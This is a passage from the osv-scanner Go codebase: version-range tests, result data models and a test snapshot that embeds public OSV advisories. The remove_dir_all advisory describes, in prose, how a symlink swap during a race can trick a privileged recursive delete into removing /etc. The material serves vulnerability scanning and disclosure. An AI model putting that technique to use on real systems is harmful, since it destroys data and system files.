buildSemverAffectsRange(&osvschema.Event{Introduced: "0"}), }, }, ) for _, v := range []string{"1.0.0", "1.1.1", "2.0.0"} { expectIsAffected(t, vuln, v, false) } } func TestOSV_IsAffected_AffectsWithSemver_SingleAffected(t *testing.T) { t.Parallel() var vuln *osvschema.Vulnerability // "Introduced: 0" means everything is affected vuln = buildOSVWithAffected( &osvschema.Affected{ Package: &osvschema.Package{Ecosystem: string(osvconstants.EcosystemNPM), Name: "my-package"}, Ranges: []*osvschema.Range{ buildSemverAffectsRange(&osvschema.Event{Introduced: "0"}), }, }, ) for _, v := range []string{"v1.0.0", "v1.1.1", "v2.0.0"} { expectIsAffected(t, vuln, v, true) } // "Fixed: 1" means all versions after this are not vulnerable vuln = buildOSVWithAffected( &osvschema.Affected{ Package: &osvschema.Package{Ecosystem: string(osvconstants.EcosystemNPM), Name: "my-package"}, Ranges: []*osvschema.Range{ buildSemverAffectsRange( &osvschema.Event{Introduced: "0"}, &osvschema.Event{Fixed: "1.0.0"}, ), }, }, ) for _, v := range []string{"0.0.0", "0.1.0", "0.0.0.1", "1.0.0-rc"} { expectIsAffected(t, vuln, v, true) } for _, v := range []string{"1.0.0", "1.1.0", "2.0.0"} { expectIsAffected(t, vuln, v, false) } // multiple fixes and introduced vuln = buildOSVWithAffected( &osvschema.Affected{ Package: &osvschema.Package{Ecosystem: string(osvconstants.EcosystemNPM), Name: "my-package"}, Ranges: []*osvschema.Range{ buildSemverAffectsRange( &osvschema.Event{Introduced: "0"}, &osvschema.Event{Fixed: "1"}, &osvschema.Event{Introduced: "2.1.0"}, &osvschema.Event{Fixed: "3.2.0"}, ), }, }, ) for _, v := range []string{"0.0.0", "0.1.0", "0.0.0.1", "1.0.0-rc"} { expectIsAffected(t, vuln, v, true) } for _, v := range []string{"1.0.0", "1.1.0", "2.0.0rc2", "2.0.1"} { expectIsAffected(t, vuln, v, false) } for _, v := range []string{"2.1.1", "2.3.4", "3.0.0", "3.0.0-rc"} { expectIsAffected(t, vuln, v, true) } for _, v := range []string{"3.2.0", "3.2.1", "4.0.0"} { expectIsAffected(t, vuln, v, false) } // an empty version should always be treated as affected expectIsAffected(t, vuln, "", true) // "LastAffected: 1" means all versions after this are not vulnerable vuln = buildOSVWithAffected( &osvschema.Affected{ Package: &osvschema.Package{Ecosystem: string(osvconstants.EcosystemNPM), Name: "my-package"}, Ranges: []*osvschema.Range{ buildSemverAffectsRange( &osvschema.Event{Introduced: "0"}, &osvschema.Event{LastAffected: "1.0.0"}, ), }, }, ) for _, v := range []string{"0.0.0", "0.1.0", "0.0.0.1", "1.0.0-rc", "1.0.0"} { expectIsAffected(t, vuln, v, true) } for _, v := range []string{"1.0.1", "1.1.0", "2.0.0"} { expectIsAffected(t, vuln, v, false) } // mix of fixes, last_known_affected, and introduced vuln = buildOSVWithAffected( &osvschema.Affected{ Package: &osvschema.Package{Ecosystem: string(osvconstants.EcosystemNPM), Name: "my-package"}, Ranges: []*osvschema.Range{ buildSemverAffectsRange( &osvschema.Event{Introduced: "0"}, &osvschema.Event{Fixed: "1"}, &osvschema.Event{Introduced: "2.1.0"}, &osvschema.Event{LastAffected: "3.1.9"}, ), }, }, ) for _, v := range []string{"0.0.0", "0.1.0", "0.0.0.1", "1.0.0-rc"} { expectIsAffected(t, vuln, v, true) } for _, v := range []string{"1.0.0", "1.1.0", "2.0.0rc2", "2.0.1"} { expectIsAffected(t, vuln, v, false) } for _, v := range []string{"2.1.1", "2.3.4", "3.0.0", "3.0.0-rc"} { expectIsAffected(t, vuln, v, true) } for _, v := range []string{"3.2.0", "3.2.1", "4.0.0"} { expectIsAffected(t, vuln, v, false) } // an empty version should always be treated as affected expectIsAffected(t, vuln, "", true) } func TestOSV_IsAffected_AffectsWithSemver_MultipleAffected(t *testing.T) { t.Parallel() vuln := buildOSVWithAffected( &osvschema.Affected{ Package: &osvschema.Package{Ecosystem: string(osvconstants.EcosystemNPM), Name: "my-package"}, Ranges: []*osvschema.Range{ buildSemverAffectsRange( &osvschema.Event{Introduced: "0"}, &osvschema.Event{Fixed: "1"}, ), }, }, &osvschema.Affected{ Package: &osvschema.Package{Ecosystem: string(osvconstants.EcosystemNPM), Name: "my-package"}, Ranges: []*osvschema.Range{ buildSemverAffectsRange( &osvschema.Event{Introduced: "2.1.0"}, &osvschema.Event{Fixed: "3.2.0"}, ), }, }, &osvschema.Affected{ Package: &osvschema.Package{Ecosystem: string(osvconstants.EcosystemNPM), Name: "my-package"}, Ranges: []*osvschema.Range{ buildSemverAffectsRange( &osvschema.Event{Introduced: "3.3.0"}, &osvschema.Event{LastAffected: "3.5.0"}, ), }, }, ) for _, v := range []string{"0.0.0", "0.1.0", "0.0.0.1", "1.0.0-rc"} { expectIsAffected(t, vuln, v, true) } for _, v := range []string{"1.0.0", "1.1.0", "2.0.0rc2", "2.0.1"} { expectIsAffected(t, vuln, v, false) } for _, v := range []string{"2.1.1", "2.3.4", "3.0.0", "3.0.0-rc"} { expectIsAffected(t, vuln, v, true) } for _, v := range []string{"3.2.0", "3.2.1", "4.0.0"} { expectIsAffected(t, vuln, v, false) } for _, v := range []string{"3.3.1", "3.4.5", "3.5.0"} { expectIsAffected(t, vuln, v, true) } // an empty version should always be treated as affected expectIsAffected(t, vuln, "", true) } func TestOSV_IsAffected_AffectsWithSemver_Unsorted(t *testing.T) { t.Parallel() // mix of fixes, last_known_affected, and introduced vuln := buildOSVWithAffected( &osvschema.Affected{ Package: &osvschema.Package{Ecosystem: string(osvconstants.EcosystemNPM), Name: "my-package"}, Ranges: []*osvschema.Range{ buildSemverAffectsRange( &osvschema.Event{Introduced: "0"}, &osvschema.Event{Introduced: "2.1.0"}, &osvschema.Event{Fixed: "1"}, &osvschema.Event{LastAffected: "3.1.9"}, ), }, }, ) for _, v := range []string{"0.0.0", "0.1.0", "0.0.0.1", "1.0.0-rc"} { expectIsAffected(t, vuln, v, true) } for _, v := range []string{"1.0.0", "1.1.0", "2.0.0rc2", "2.0.1"} { expectIsAffected(t, vuln, v, false) } for _, v := range []string{"2.1.1", "2.3.4", "3.0.0", "3.0.0-rc"} { expectIsAffected(t, vuln, v, true) } for _, v := range []string{"3.2.0", "3.2.1", "4.0.0"} { expectIsAffected(t, vuln, v, false) } // an empty version should always be treated as affected expectIsAffected(t, vuln, "", true) // an empty version should always be treated as affected expectIsAffected(t, vuln, "", true) // zeros with build strings vuln = buildOSVWithAffected( &osvschema.Affected{ // golang.org/x/sys Package: &osvschema.Package{Ecosystem: string(osvconstants.EcosystemNPM), Name: "my-package"}, Ranges: []*osvschema.Range{ buildSemverAffectsRange( &osvschema.Event{Fixed: "0.0.0-20220412211240-33da011f77ad"}, &osvschema.Event{Introduced: "0"}, ), }, }, &osvschema.Affected{ // golang.org/x/net Package: &osvschema.Package{Ecosystem: string(osvconstants.EcosystemNPM), Name: "my-package"}, Ranges: []*osvschema.Range{ buildSemverAffectsRange( &osvschema.Event{Introduced: "0.0.0-20180925071336-cf3bd585ca2a"}, &osvschema.Event{Fixed: "0"}, ), }, }, ) for _, v := range []string{"0.0.0", "0.14.0"} { expectIsAffected(t, vuln, v, false) } for _, v := range []string{"0.0.0-20180925071336-cf3bd585ca2a"} { expectIsAffected(t, vuln, v, true) } // an empty version should always be treated as affected expectIsAffected(t, vuln, "", true) } func TestOSV_IsAffected_OnlyVersions(t *testing.T) { t.Parallel() vuln := buildOSVWithAffected( &osvschema.Affected{ Package: &osvschema.Package{Ecosystem: string(osvconstants.EcosystemNPM), Name: "my-package"}, Versions: []string{"1.0.0"}, }, ) expectIsAffected(t, vuln, "0.0.0", false) expectIsAffected(t, vuln, "1.0.0", true) expectIsAffected(t, vuln, "1.0.0-beta1", false) expectIsAffected(t, vuln, "1.1.0", false) // an empty version should always be treated as affected expectIsAffected(t, vuln, "", true) } func TestOSV_EcosystemsWithSuffix(t *testing.T) { t.Parallel() vuln := buildOSVWithAffected( &osvschema.Affected{ Package: &osvschema.Package{Ecosystem: "Debian:12", Name: "my-package"}, Ranges: []*osvschema.Range{ buildSemverAffectsRange( &osvschema.Event{Introduced: "0"}, ), }, }, ) pkg := &extractor.Package{ Name: "my-package", Version: "0.0.0", PURLType: purl.TypeDebian, Metadata: &metadata.Metadata{ OSID: "Debian", OSVersionID: "12", }, } if !vulns.IsAffected(vuln, pkg) { t.Errorf("Expected OSV to affect package version %s but it did not", "0.0.0") } } ================================================ FILE: internal/version/version.go ================================================ // Package version stores the version of osv-scanner. package version // OSVVersion is the current release version, you should update this variable when doing a release const OSVVersion = "2.3.4" ================================================ FILE: osv-scanner.toml ================================================ ================================================ FILE: pkg/models/cyclonedx.go ================================================ // Package models provides data models for osv-scanner. package models type CycloneDXVersion int const ( CycloneDXVersion14 CycloneDXVersion = iota CycloneDXVersion15 CycloneDXVersion16 ) ================================================ FILE: pkg/models/image.go ================================================ package models import "github.com/opencontainers/go-digest" type ImageOriginDetails struct { Index int `json:"index"` } type ImageMetadata struct { OS string `json:"os"` LayerMetadata []LayerMetadata `json:"layer_metadata"` BaseImages [][]BaseImageDetails `json:"base_images"` } type BaseImageDetails struct { Name string `json:"name"` // TODO: Not yet filled in Tags []string `json:"tags"` } type LayerMetadata struct { DiffID digest.Digest `json:"diff_id"` Command string `json:"command"` IsEmpty bool `json:"is_empty"` BaseImageIndex int `json:"base_image_index"` } ================================================ FILE: pkg/models/results.go ================================================ package models import ( "encoding/json" "fmt" "slices" "strings" "github.com/google/osv-scalibr/extractor" "github.com/google/osv-scalibr/inventory" "github.com/google/osv-scalibr/inventory/vex" "github.com/ossf/osv-schema/bindings/go/osvschema" "google.golang.org/protobuf/encoding/protojson" ) // VulnerabilityResults is the top-level struct for the results of a scan type VulnerabilityResults struct { Results []PackageSource `json:"results"` ExperimentalAnalysisConfig ExperimentalAnalysisConfig `json:"experimental_config"` ExperimentalGenericFindings []*inventory.GenericFinding `json:"experimental_generic_findings,omitempty"` ImageMetadata *ImageMetadata `json:"image_metadata,omitempty"` LicenseSummary []LicenseCount `json:"license_summary,omitempty"` } type LicenseCount struct { Name License `json:"name"` Count int `json:"count"` } // ExperimentalAnalysisConfig is an experimental type intended to contain the // types of analysis performed on packages found by the scanner. type ExperimentalAnalysisConfig struct { Licenses ExperimentalLicenseConfig `json:"licenses"` } type ExperimentalLicenseConfig struct { Summary bool `json:"summary"` Allowlist []License `json:"allowlist"` } // Flatten the grouped/nested vulnerability results into one flat array. func (vulns *VulnerabilityResults) Flatten() []VulnerabilityFlattened { results := []VulnerabilityFlattened{} for _, res := range vulns.Results { for _, pkg := range res.Packages { for _, v := range pkg.Vulnerabilities { results = append(results, VulnerabilityFlattened{ Source: res.Source, Package: pkg.Package, DepGroups: pkg.DepGroups, Vulnerability: v, GroupInfo: getGroupInfoForVuln(pkg.Groups, v.GetId()), }) } if len(pkg.LicenseViolations) > 0 { results = append(results, VulnerabilityFlattened{ Source: res.Source, Package: pkg.Package, DepGroups: pkg.DepGroups, Licenses: pkg.Licenses, LicenseViolations: pkg.LicenseViolations, }) } if pkg.Package.Deprecated { results = append(results, VulnerabilityFlattened{ Source: res.Source, Package: pkg.Package, Deprecated: pkg.Package.Deprecated, }) } } } return results } func getGroupInfoForVuln(groups []GroupInfo, vulnID string) GroupInfo { // groupIdx should never be -1 since vulnerabilities should always be in one group groupIdx := slices.IndexFunc(groups, func(g GroupInfo) bool { return slices.Contains(g.IDs, vulnID) }) return groups[groupIdx] } // VulnerabilityFlattened is a flattened version of the VulnerabilityResults // TODO: rename this to IssueFlattened or similar in the next major release as // it now contains license violations. type VulnerabilityFlattened struct { Source SourceInfo Package PackageInfo DepGroups []string Vulnerability *osvschema.Vulnerability GroupInfo GroupInfo Licenses []License LicenseViolations []License Deprecated bool } // MarshalJSON implements the json.Marshaler interface. // It is required because the Vulnerability field is a proto message, // which requires protojson to marshal, while the rest of the struct uses // the standard encoding/json library. func (v *VulnerabilityFlattened) MarshalJSON() ([]byte, error) { // Use alias to avoid recursion. type alias VulnerabilityFlattened // Pre-process the custom field. var rawVulnerability json.RawMessage if v.Vulnerability != nil { unstableJSON, err := protojson.Marshal(v.Vulnerability) if err != nil { return nil, fmt.Errorf("failed to marshal Vulnerability: %w", err) } var vuln any if err := json.Unmarshal(unstableJSON, &vuln); err != nil { return nil, err } b, err := json.MarshalIndent(vuln, "", " ") if err != nil { return nil, err } rawVulnerability = b } // Marshal a temporary struct that combines the standard // fields (from the alias) with the custom-handled field. return json.Marshal(&struct { *alias Vulnerability json.RawMessage `json:"Vulnerability"` }{ alias: (*alias)(v), Vulnerability: rawVulnerability, }) } // UnmarshalJSON implements the json.Unmarshaler interface. // It is required because the Vulnerability field is a proto message, // which requires protojson to unmarshal, while the rest of the struct uses // the standard encoding/json library. func (v *VulnerabilityFlattened) UnmarshalJSON(data []byte) error { // Unmarshal into a temporary struct with Vulnerability as json.RawMessage. // Use an alias to avoid an infinite recursion loop. type alias VulnerabilityFlattened tmp := &struct { *alias Vulnerability json.RawMessage `json:"Vulnerability"` }{ alias: (*alias)(v), } if err := json.Unmarshal(data, &tmp); err != nil { return err } // If there is a vulnerability, unmarshal it using protojson. if len(tmp.Vulnerability) > 0 && string(tmp.Vulnerability) != "null" { v.Vulnerability = &osvschema.Vulnerability{} if err := protojson.Unmarshal(tmp.Vulnerability, v.Vulnerability); err != nil { return err } } return nil } // SourceType categorizes packages based on the extractor that extracted // the "source", for use in the output. type SourceType string const ( SourceTypeUnknown SourceType = "unknown" SourceTypeOSPackage SourceType = "os" SourceTypeProjectPackage SourceType = "lockfile" SourceTypeArtifact SourceType = "artifact" SourceTypeSBOM SourceType = "sbom" SourceTypeGit SourceType = "git" ) type SourceInfo struct { Path string `json:"path"` Type SourceType `json:"type"` } type Metadata struct { RepoURL string `json:"repo_url"` DepGroups []string `json:"-"` } func (s SourceInfo) String() string { return string(s.Type) + ":" + s.Path } // PackageSource represents Vulnerabilities associated with a Source type PackageSource struct { Source SourceInfo `json:"source"` // Place Annotations in PackageSource instead of SourceInfo as we need SourceInfo to be mappable ExperimentalPES []*vex.PackageExploitabilitySignal `json:"experimental_pes,omitempty"` Packages []PackageVulns `json:"packages"` } // License is an SPDX license. type License string // PackageVulns grouped by package // TODO: rename this to be Package as it now includes license information too. type PackageVulns struct { Package PackageInfo `json:"package"` DepGroups []string `json:"dependency_groups,omitempty"` Vulnerabilities []*osvschema.Vulnerability `json:"vulnerabilities,omitempty"` Groups []GroupInfo `json:"groups,omitempty"` Licenses []License `json:"licenses,omitempty"` LicenseViolations []License `json:"license_violations,omitempty"` } // MarshalJSON implements the json.Marshaler interface. // It is required because the Vulnerabilities field is a slice of proto messages, // which requires protojson to marshal, while the rest of the struct uses // the standard encoding/json library. func (p *PackageVulns) MarshalJSON() ([]byte, error) { // Use alias to avoid recursion. type alias PackageVulns // Pre-process the custom field. var rawVulnerabilities []json.RawMessage if len(p.Vulnerabilities) > 0 { rawVulnerabilities = make([]json.RawMessage, 0, len(p.Vulnerabilities)) for _, vuln := range p.Vulnerabilities { unstableJSON, err := protojson.Marshal(vuln) if err != nil { return nil, fmt.Errorf("failed to marshal vulnerability: %w", err) } var vuln any if err := json.Unmarshal(unstableJSON, &vuln); err != nil { return nil, err } b, err := json.MarshalIndent(vuln, "", " ") if err != nil { return nil, err } rawVulnerabilities = append(rawVulnerabilities, b) } } // Marshal a temporary struct that combines the standard // fields (from the alias) with the custom-handled field. return json.Marshal(&struct { *alias Vulnerabilities []json.RawMessage `json:"vulnerabilities,omitempty"` }{ alias: (*alias)(p), Vulnerabilities: rawVulnerabilities, }) } // UnmarshalJSON implements the json.Unmarshaler interface. // It is required because the Vulnerabilities field is a slice of proto messages, // which requires protojson to unmarshal, while the rest of the struct uses // the standard encoding/json library. func (p *PackageVulns) UnmarshalJSON(data []byte) error { // Use alias to avoid recursion. type alias PackageVulns // Use temporary struct to combine standard fields (via alias) // and the manually processed field (via shadowing). tmp := &struct { *alias Vulnerabilities []json.RawMessage `json:"vulnerabilities,omitempty"` }{ alias: (*alias)(p), } // Unmarshal into the temporary struct. if err := json.Unmarshal(data, &tmp); err != nil { return err } // Manually process the custom field from RawMessage format. if len(tmp.Vulnerabilities) > 0 { p.Vulnerabilities = make([]*osvschema.Vulnerability, 0, len(tmp.Vulnerabilities)) for i, rawVuln := range tmp.Vulnerabilities { vuln := &osvschema.Vulnerability{} if err := protojson.Unmarshal(rawVuln, vuln); err != nil { return fmt.Errorf("failed to protojson unmarshal vulnerability at index %d: %w", i, err) } p.Vulnerabilities = append(p.Vulnerabilities, vuln) } } return nil } type GroupInfo struct { // IDs expected to be sorted in alphanumeric order IDs []string `json:"ids"` // Aliases include all aliases and IDs Aliases []string `json:"aliases"` // Map of Vulnerability IDs to AnalysisInfo ExperimentalAnalysis map[string]AnalysisInfo `json:"experimental_analysis,omitempty"` MaxSeverity string `json:"max_severity"` } // IsCalled returns true if any analysis performed determines that the vulnerability is being called // Also returns true if no analysis is performed func (groupInfo *GroupInfo) IsCalled() bool { if len(groupInfo.ExperimentalAnalysis) == 0 { return true } for _, analysis := range groupInfo.ExperimentalAnalysis { if analysis.Called { return true } } return false } func (groupInfo *GroupInfo) IsGroupUnimportant() bool { if len(groupInfo.ExperimentalAnalysis) == 0 { return false } for _, analysis := range groupInfo.ExperimentalAnalysis { if analysis.Unimportant { return true } } return false } func (groupInfo *GroupInfo) IndexString() string { // Assumes IDs is sorted return strings.Join(groupInfo.IDs, ",") } type AnalysisInfo struct { Called bool `json:"called"` Unimportant bool `json:"unimportant"` } type PackageInfo struct { Name string `json:"name"` OSPackageName string `json:"os_package_name,omitempty"` Version string `json:"version"` Ecosystem string `json:"ecosystem"` Commit string `json:"commit,omitempty"` Deprecated bool `json:"deprecated,omitempty"` ImageOrigin *ImageOriginDetails `json:"image_origin_details,omitempty"` Inventory *extractor.Package `json:"-"` } ================================================ FILE: pkg/models/results_test.go ================================================ package models_test import ( "testing" "github.com/google/go-cmp/cmp" "github.com/google/osv-scanner/v2/pkg/models" "github.com/ossf/osv-schema/bindings/go/osvschema" "google.golang.org/protobuf/testing/protocmp" ) func TestFlatten(t *testing.T) { t.Parallel() // Test case 1: When there are no vulnerabilities vulns := models.VulnerabilityResults{Results: []models.PackageSource{}} expectedFlattened := []models.VulnerabilityFlattened{} flattened := vulns.Flatten() if diff := cmp.Diff(expectedFlattened, flattened, protocmp.Transform()); diff != "" { t.Errorf("Flatten() returned unexpected result (-want +got):\n%s", diff) } // Test case 2: When there are vulnerabilities group := models.GroupInfo{IDs: []string{"CVE-2021-1234"}} pkg := models.PackageVulns{ Package: models.PackageInfo{Name: "package"}, DepGroups: []string{"dev"}, Groups: []models.GroupInfo{group}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "CVE-2021-1234", Severity: []*osvschema.Severity{ { Score: "1", }, }, }, }, Licenses: []models.License{models.License("MIT")}, } source := models.PackageSource{Source: models.SourceInfo{Path: "package"}, Packages: []models.PackageVulns{pkg}} vulns = models.VulnerabilityResults{Results: []models.PackageSource{source}} expectedFlattened = []models.VulnerabilityFlattened{ { Source: source.Source, Package: pkg.Package, DepGroups: []string{"dev"}, Vulnerability: pkg.Vulnerabilities[0], GroupInfo: group, }, } flattened = vulns.Flatten() if diff := cmp.Diff(expectedFlattened, flattened, protocmp.Transform()); diff != "" { t.Errorf("Flatten() returned unexpected result (-want +got):\n%s", diff) } // Test case 3: When there are no vulnerabilities and license violations group = models.GroupInfo{IDs: []string{"CVE-2021-1234"}} pkg = models.PackageVulns{ Package: models.PackageInfo{Name: "package"}, DepGroups: []string{"dev"}, Groups: []models.GroupInfo{group}, Licenses: []models.License{"MIT"}, LicenseViolations: []models.License{"MIT"}, } source = models.PackageSource{Source: models.SourceInfo{Path: "package"}, Packages: []models.PackageVulns{pkg}} vulns = models.VulnerabilityResults{Results: []models.PackageSource{source}} expectedFlattened = []models.VulnerabilityFlattened{ { Source: source.Source, Package: pkg.Package, DepGroups: []string{"dev"}, Licenses: []models.License{"MIT"}, LicenseViolations: []models.License{"MIT"}, }, } flattened = vulns.Flatten() if diff := cmp.Diff(expectedFlattened, flattened, protocmp.Transform()); diff != "" { t.Errorf("Flatten() returned unexpected result (-want +got):\n%s", diff) } // Test case 4: When there are vulnerabilities and license violations group = models.GroupInfo{IDs: []string{"CVE-2021-1234"}} pkg = models.PackageVulns{ Package: models.PackageInfo{Name: "package"}, DepGroups: []string{"dev"}, Groups: []models.GroupInfo{group}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "CVE-2021-1234", Severity: []*osvschema.Severity{ { Score: "1", }, }, }, }, Licenses: []models.License{"MIT"}, LicenseViolations: []models.License{"MIT"}, } source = models.PackageSource{Source: models.SourceInfo{Path: "package"}, Packages: []models.PackageVulns{pkg}} vulns = models.VulnerabilityResults{Results: []models.PackageSource{source}} expectedFlattened = []models.VulnerabilityFlattened{ { Source: source.Source, Package: pkg.Package, DepGroups: []string{"dev"}, Vulnerability: pkg.Vulnerabilities[0], GroupInfo: group, }, { Source: source.Source, Package: pkg.Package, DepGroups: []string{"dev"}, Licenses: []models.License{"MIT"}, LicenseViolations: []models.License{"MIT"}, }, } flattened = vulns.Flatten() if diff := cmp.Diff(expectedFlattened, flattened, protocmp.Transform()); diff != "" { t.Errorf("Flatten() returned unexpected result (-want +got):\n%s", diff) } } ================================================ FILE: pkg/osvscanner/__snapshots__/filter_internal_test.snap ================================================ [Test_filterResults/filter_everything - 1] { "results": [], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [Test_filterResults/filter_nothing - 1] { "results": [ { "source": { "path": "testdata/filter/none/configs/a/", "type": "lockfile" }, "packages": [ { "package": { "name": "remove_dir_all", "version": "0.5.3", "ecosystem": "crates.io" }, "groups": [ { "ids": [ "GHSA-mc8h-8q98-g5hr", "RUSTSEC-2023-0018" ], "aliases": [ "GHSA-mc8h-8q98-g5hr", "RUSTSEC-2023-0018" ], "max_severity": "" } ], "vulnerabilities": [ { "affected": [ { "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-mc8h-8q98-g5hr/GHSA-mc8h-8q98-g5hr.json" }, "package": { "ecosystem": "crates.io", "name": "remove_dir_all", "purl": "pkg:cargo/remove_dir_all" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "0.8.0" } ], "type": "SEMVER" } ] } ], "database_specific": { "cwe_ids": [ "CWE-366", "CWE-367" ], "github_reviewed": true, "github_reviewed_at": "2023-02-24T16:23:59Z", "nvd_published_at": null, "severity": "LOW" }, "details": "The `remove_dir_all` crate is a Rust library that offers additional features over the Rust standard library `fs::remove_dir_all` function. It suffers the same class of failure as the code it was layering over: TOCTOU race conditions, with the ability to cause arbitrary paths to be deleted by substituting a symlink for a path after the type of the path was checked.\n\nThanks to the Rust security team for identifying the problem and alerting us to it.", "id": "GHSA-mc8h-8q98-g5hr", "modified": "2023-02-24T16:23:59Z", "published": "2023-02-24T16:23:59Z", "references": [ { "type": "WEB", "url": "https://github.com/XAMPPRocky/remove_dir_all/security/advisories/GHSA-mc8h-8q98-g5hr" }, { "type": "WEB", "url": "https://github.com/XAMPPRocky/remove_dir_all/commit/7247a8b6ee59fc99bbb69ca6b3ca4bfd8c809ead" }, { "type": "PACKAGE", "url": "https://github.com/XAMPPRocky/remove_dir_all" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0018.html" } ], "schema_version": "1.4.0", "summary": "Race Condition Enabling Link Following and Time-of-check Time-of-use (TOCTOU) Race Condition in remove_dir_all" }, { "affected": [ { "database_specific": { "categories": [], "cvss": null, "informational": null, "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2023-0018.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [ "remove_dir_all::ensure_empty_dir", "remove_dir_all::remove_dir_all", "remove_dir_all::remove_dir_contents" ], "os": [] } }, "package": { "ecosystem": "crates.io", "name": "remove_dir_all", "purl": "pkg:cargo/remove_dir_all" }, "ranges": [ { "events": [ { "introduced": "0.0.0-0" }, { "fixed": "0.8.0" } ], "type": "SEMVER" } ] } ], "aliases": [ "GHSA-mc8h-8q98-g5hr" ], "details": "The remove_dir_all crate is a Rust library that offers additional features over the Rust\nstandard library fs::remove_dir_all function.\n\nIt was possible to trick a privileged process doing a recursive delete in an\nattacker controlled directory into deleting privileged files, on all operating systems.\n\nFor instance, consider deleting a tree called 'etc' in a parent directory\ncalled 'p'. Between calling `remove_dir_all(\"a\")` and remove_dir_all(\"a\")\nactually starting its work, the attacker can move 'p' to 'p-prime', and\nreplace 'p' with a symlink to '/'. Then the privileged process deletes 'p/etc'\nwhich is actually /etc, and now your system is broken. There are some\nmitigations for this exact scenario, such as CWD relative file lookup, but\nthey are not guaranteed - any code using absolute paths will not have that\nprotection in place.\n\nThe same attack could be performed at any point in the directory tree being\ndeleted: if 'a' contains a child directory called 'etc', attacking the\ndeletion by replacing 'a' with a link is possible.\n\nThe new code in this release mitigates the attack within the directory tree\nbeing deleted by using file-handle relative operations: to open 'a/etc', the\npath 'etc' relative to 'a' is opened, where 'a' is represented by a file\ndescriptor (Unix) or handle (Windows). With the exception of the entry points\ninto the directory deletion logic, this is robust against manipulation of the\ndirectory hierarchy, and remove_dir_all will only delete files and directories\ncontained in the tree it is deleting.\n\nThe entry path however is a challenge - as described above, there are some\npotential mitigations, but since using them must be done by the calling code,\nit is hard to be confident about the security properties of the path based\ninterface.\n\nThe new extension trait `RemoveDir` provides an interface where it is much\nharder to get it wrong.\n\n`somedir.remove_dir_contents(\"name-of-child\")`.\n\nCallers can then make their own security evaluation about how to securely get\na directory handle. That is still not particularly obvious, and we're going to\nfollow up with a helper of some sort (probably in the `fs_at` crate). Once\nthat is available, the path based entry points will get deprecated.\n\nIn the interim, processes that might run with elevated privileges should\nfigure out how to securely identify the directory they are going to delete, to\navoid the initial race. Pragmatically, other processes should be fine with the\npath based entry points : this is the same interface `std::fs::remove_dir_all`\noffers, and an unprivileged process running in an attacker controlled\ndirectory can't do anything that the attacker can't already do.", "id": "RUSTSEC-2023-0018", "modified": "2023-03-04T21:50:30Z", "published": "2023-02-24T12:00:00Z", "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/remove_dir_all" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0018.html" }, { "type": "WEB", "url": "https://github.com/XAMPPRocky/remove_dir_all/commit/7247a8b6ee59fc99bbb69ca6b3ca4bfd8c809ead" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-mc8h-8q98-g5hr" } ], "schema_version": "1.4.0", "summary": "Race Condition Enabling Link Following and Time-of-check Time-of-use (TOCTOU)" } ] }, { "package": { "name": "time", "version": "0.1.45", "ecosystem": "crates.io" }, "groups": [ { "ids": [ "GHSA-wcg3-cvx6-7396", "RUSTSEC-2020-0071" ], "aliases": [ "GHSA-wcg3-cvx6-7396", "RUSTSEC-2020-0071" ], "max_severity": "" } ], "vulnerabilities": [ { "affected": [ { "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-wcg3-cvx6-7396/GHSA-wcg3-cvx6-7396.json" }, "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "events": [ { "introduced": "0.1" }, { "last_affected": "0.2" } ], "type": "SEMVER" } ] }, { "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-wcg3-cvx6-7396/GHSA-wcg3-cvx6-7396.json" }, "ecosystem_specific": { "affected_functions": [ "time::UtcOffset::local_offset_at", "time::UtcOffset::try_local_offset_at", "time::UtcOffset::current_local_offset", "time::UtcOffset::try_current_local_offset", "time::OffsetDateTime::now_local", "time::OffsetDateTime::try_now_local" ] }, "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "events": [ { "introduced": "0.2.7" }, { "fixed": "0.2.23" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2020-26235" ], "database_specific": { "cwe_ids": [ "CWE-476" ], "github_reviewed": true, "severity": "MODERATE" }, "details": "### Impact\n\nUnix-like operating systems may segfault due to dereferencing a dangling pointer in specific circumstances. This requires an environment variable to be set in a different thread than the affected functions. This may occur without the user's knowledge, notably in a third-party library.\n\nThe affected functions from time 0.2.7 through 0.2.22 are:\n\n- `time::UtcOffset::local_offset_at`\n- `time::UtcOffset::try_local_offset_at`\n- `time::UtcOffset::current_local_offset`\n- `time::UtcOffset::try_current_local_offset`\n- `time::OffsetDateTime::now_local`\n- `time::OffsetDateTime::try_now_local`\n\nThe affected functions in time 0.1 (all versions) are:\n\n- `at`\n- `at_utc`\n- `now`\n\nNon-Unix targets (including Windows and wasm) are unaffected.\n\n### Patches\n\nIn some versions of `time`, the internal method that determines the local offset has been modified to always return `None` on the affected operating systems. This has the effect of returning an `Err` on the `try_*` methods and `UTC` on the non-`try_*` methods. In later versions, `time` will attempt to determine the number of threads running in the process. If the process is single-threaded, the call will proceed as its safety invariant is upheld.\n\nUsers and library authors with time in their dependency tree must perform `cargo update`, which will pull in the updated, unaffected code.\n\nUsers of time 0.1 do not have a patch and must upgrade to an unaffected version: time 0.2.23 or greater or the 0.3 series.\n\n### Workarounds\n\nLibrary authors must ensure that the program only has one running thread at the time of calling any affected method. Binary authors may do the same and/or ensure that no other thread is actively mutating the environment.\n\n### References\n\n[time-rs/time#293](https://github.com/time-rs/time/issues/293).", "id": "GHSA-wcg3-cvx6-7396", "modified": "2022-12-06T00:16:25Z", "published": "2021-08-25T20:56:46Z", "references": [ { "type": "WEB", "url": "https://github.com/time-rs/time/security/advisories/GHSA-wcg3-cvx6-7396" }, { 